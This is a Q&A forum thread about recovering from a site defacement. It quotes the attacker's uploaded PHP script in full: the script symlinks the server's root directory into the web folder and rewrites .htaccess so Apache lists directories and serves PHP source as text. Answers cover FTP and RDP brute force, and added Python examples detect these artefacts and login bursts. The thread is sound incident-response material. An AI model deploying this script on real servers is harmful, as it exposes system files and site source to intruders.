How to protect attack site

Viewed 623 times

1

Recently I was the target of an attack on my site; this attack defaced my server. This script was uploaded and then run, see:

<?php
// Opening tag not shown in the post. The handler only runs when the "red" POST field is present.
if (isset($_POST['red'])) {
    // First attempt: a symlink named red.txt pointing at the filesystem root
    system('ln -s / red.txt');
    // base64 of a four-line .htaccess: "Options Indexes FollowSymLinks", a DirectoryIndex, and
    // AddType/AddHandler lines that make Apache serve .php files as plain text instead of executing them
    $fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
    // Overwrites the site's .htaccess with the decoded directives
    $file = fopen(".htaccess", "w+");
    $write = fwrite($file, base64_decode($fvckem));
    // Second attempt at the same symlink, via PHP's own function
    $red = symlink("/", "red.txt");

    $rt = "
Bypassed Successfully";
    echo "

Feito .. !

Servidor desconfigurado.
$rt";
}

From the little knowledge I have, it seemed to be an attack via .htaccess. I wonder: how can I protect myself from possible new attacks?

  • You left open doors to reach your server: Terminal Services, SSH, FTP; the hacker got in somewhere. Take a look at the logs and see whether you had any access of this type outside normal hours, or some external IP accessing the server.

  • Beforehand, I recommend setting up a firewall that blocks any external access to the server, leaving it accessible only on the local network, and changing the passwords.

  • Hello @Sneeps Ninja, access is via FTP, to send the pages to the server.

  • So with FTP there are N ways to do brute-force or dictionary attacks. Check whether there is any security implementation of the type "3 failed attempts, then start dropping"; on Linux you can do it via iptables.

  • Another important tip: the client machine (the one that connects to the server) may have some trojan that picks up passwords. Keep an eye out, it sniffs everything.
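The script in the question leaves two things behind on the server: a symlink that escapes the document root, and a rewritten .htaccess that re-enables FollowSymLinks and serves PHP as text. The following scanner is an added example, not code from the question or from any answer, that walks a document root and reports both artefacts so they can be found and removed. The Apache and php.ini settings named in its docstring (`Options -FollowSymLinks +SymLinksIfOwnerMatch`, `AllowOverride None`, `disable_functions`, `open_basedir`) are the usual hardening for a typical Apache + mod_php site and are assumptions about that setup, not something the question states. The sample document root it builds is constructed for the example.

```python
"""Added example (not code from the original post): find the two artefacts the
posted script leaves behind in an Apache document root, so a defender can locate
and remove them after an incident like this one.

Indicators:
  1. a symlink inside the docroot whose target resolves outside the docroot
     (the script made red.txt -> /);
  2. a .htaccess that turns on FollowSymLinks or Indexes, or maps .php to a
     handler that is not PHP, so Apache serves PHP (and whatever the symlink
     reaches) as plain text.

The server-side fix is Apache configuration, not code (assumed typical setup):
  Options -Indexes -FollowSymLinks +SymLinksIfOwnerMatch
  AllowOverride None      (or a list that excludes Options and FileInfo)
and in php.ini: disable_functions = system,exec,shell_exec,passthru,symlink
plus open_basedir limited to the site directory.
"""
import os
import re
import tempfile
from pathlib import Path

# Directives that, once an attacker can write .htaccess, turn a symlink into a file-read primitive.
# The lookbehind skips the "-FollowSymLinks" / "-Indexes" forms, which disable rather than enable.
RISKY_DIRECTIVES = [
    re.compile(r"^\s*Options\b[^\n]*(?<![-\w])\+?FollowSymLinks\b", re.I | re.M),
    re.compile(r"^\s*Options\b[^\n]*(?<![-\w])\+?Indexes\b", re.I | re.M),
    # AddType/AddHandler for .php whose first argument is not a PHP handler or MIME type
    re.compile(r"^\s*Add(?:Type|Handler)\s+(?!application/x-httpd-php\b|php)\S+\s+[^\n]*\.php\b",
               re.I | re.M),
]


def scan_docroot(docroot):
    """Return a list of (kind, path, detail) findings for one document root."""
    root = Path(docroot).resolve()
    findings = []
    # followlinks=False: never descend into a symlinked directory such as red.txt -> /
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            if p.is_symlink():
                target = p.resolve()  # follows the link; a link to "/" resolves to "/"
                if target != root and root not in target.parents:
                    findings.append(("escaping-symlink", str(p), os.readlink(p)))
            elif name == ".htaccess":
                text = p.read_text(errors="replace")
                for rx in RISKY_DIRECTIVES:
                    m = rx.search(text)
                    if m:
                        findings.append(("risky-htaccess", str(p), m.group(0).strip()))
    return findings


def build_sample_docroot(infected=True):
    """Build a constructed sample docroot (not the questioner's server): a small clean
    site and, when infected=True, the two artefacts the posted script would leave."""
    d = Path(tempfile.mkdtemp(prefix="docroot-")).resolve()
    (d / "index.php").write_text("<?php echo 'hello'; ?>\n")
    (d / "css").mkdir()
    (d / "css" / "style.css").write_text("body { margin: 0 }\n")
    (d / "images").symlink_to(d / "css")  # benign: stays inside the docroot
    if infected:
        (d / "red.txt").symlink_to("/")  # escaping: what the script created
        (d / ".htaccess").write_text("Options Indexes FollowSymLinks\nAddHandler txt .php\n")
    else:
        (d / ".htaccess").write_text("Options -Indexes -FollowSymLinks\n")  # hardened form
    return d


if __name__ == "__main__":
    for kind, path, detail in scan_docroot(build_sample_docroot()):
        print(f"{kind:17} {path}  ({detail})")
```

Run it against a real site with `scan_docroot("/var/www/html")` (path assumed). The benign `images` link is deliberately included: a symlink is only reported when it resolves outside the root, which is what distinguishes normal site layout from the attacker's `red.txt`.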

1 answer

2


I’m going to talk about a possible flaw; we’d have to take a closer look at your case to see whether it fits.

Brute force on Terminal Services: http://www.pedropereira.net/terminal-services-rdp-brute-force/

It scares me that Microsoft has not implemented a safeguard: port 3389 can be forced in a sneaky way, and we have many old cases of this type https://www.linkedin.com/grp/post/112919-89820598

The experts’ recommendation http://blogs.technet.com/b/risco/archive/2012/03/16/201-necess-225-ria-a-instala-231-227-o-do-ms12-020-o-mais-r-225-pido-poss-237-vel.aspx

  1. Do not use the service because it is not safe
  2. Then if it is still really necessary then Lock TCP port 3389 in the enterprise perimeter firewall
  3. Turn on Network Level Authentication, which would not prevent brute force, it just makes the attack a little harder.

See an example of a brute-force access attempt on Windows Server; this was recent. You can see a lot of failed attempts in quick succession, which proves that we have a brute-force attempt in this case.

[image omitted: screenshot of the failed logon attempts described above]
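The screenshot above and the "3 failed attempts, then start dropping" rule from the comments on the question describe the same detection: many failures from one source inside a short window. The script below is an added example, not code from the answer or the comments, that implements that rule over a constructed, simplified logon log. The line format is invented for the example; feeding it from Windows event 4625 (RDP) or the FTP daemon's auth log is assumed and not shown. The iptables rules it renders follow the comment's suggestion and are printed for review, not executed.

```python
"""Added example, not code from the original answer or comments: a small
detector for the pattern the answer's screenshot shows (many failed logons from
one source in quick succession) and for the "three failures, then drop" rule
the comments suggest for FTP.

Input format is constructed for this example, one attempt per line:
    YYYY-MM-DD HH:MM:SS <service> <source-ip> <OK|FAIL>
A real deployment would feed it from Windows event 4625 (RDP) or the FTP
daemon's auth log; that mapping is assumed, not shown.
"""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: one burst from a single address at 02:13, a normal user typo,
# and three spread-out failures that should not trip a 5-minute window.
SAMPLE_LOG = """\
2015-06-10 02:13:05 rdp 203.0.113.5 FAIL
2015-06-10 02:13:06 rdp 203.0.113.5 FAIL
2015-06-10 02:13:08 rdp 203.0.113.5 FAIL
2015-06-10 02:13:09 rdp 203.0.113.5 FAIL
2015-06-10 02:13:11 rdp 203.0.113.5 FAIL
2015-06-10 02:13:12 rdp 203.0.113.5 FAIL
2015-06-10 09:02:41 ftp 198.51.100.7 FAIL
2015-06-10 09:02:55 ftp 198.51.100.7 OK
2015-06-10 10:15:00 ftp 192.0.2.10 FAIL
2015-06-10 12:40:00 ftp 192.0.2.10 FAIL
2015-06-10 15:05:00 ftp 192.0.2.10 FAIL
"""


def parse_log(lines):
    """Yield (timestamp, service, ip, succeeded) for each non-empty line."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        date, clock, service, ip, result = line.split()
        yield datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S"), service, ip, result == "OK"


def detect_bursts(lines, threshold=3, window_minutes=5):
    """Flag sources with at least `threshold` failures inside any `window_minutes` span.

    Returns {ip: {"service", "first", "last", "failures"}}: "failures" is the
    address's total failure count, "first" the start of the window that tripped.
    """
    window = timedelta(minutes=window_minutes)
    recent = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    totals = Counter()
    flagged = {}
    for ts, service, ip, ok in parse_log(lines):
        if ok:
            continue
        totals[ip] += 1
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # evict failures that fell out of the sliding window
            q.popleft()
        if len(q) >= threshold:
            info = flagged.setdefault(ip, {"service": service, "first": q[0]})
            info["last"] = ts
            info["failures"] = totals[ip]
    return flagged


def off_hours_failures(lines, start_hour=8, end_hour=18):
    """Addresses with failed logons outside business hours, the check the comments suggest."""
    return {ip for ts, _, ip, ok in parse_log(lines)
            if not ok and not (start_hour <= ts.hour < end_hour)}


def iptables_rules(flagged):
    """Render one DROP rule per flagged source (returned for review, not executed)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(flagged)]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    hits = detect_bursts(lines)
    for ip, info in hits.items():
        print(f"{ip}: {info['failures']} failures on {info['service']} "
              f"between {info['first']:%H:%M:%S} and {info['last']:%H:%M:%S}")
    print("off-hours:", sorted(off_hours_failures(lines)))
    for rule in iptables_rules(hits):
        print(rule)
```

The sliding window is what keeps the three spread-out failures from `192.0.2.10` below the threshold while the six-in-seven-seconds burst from `203.0.113.5` trips it; widening `window_minutes` is the knob that trades false positives against slow, patient guessing.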
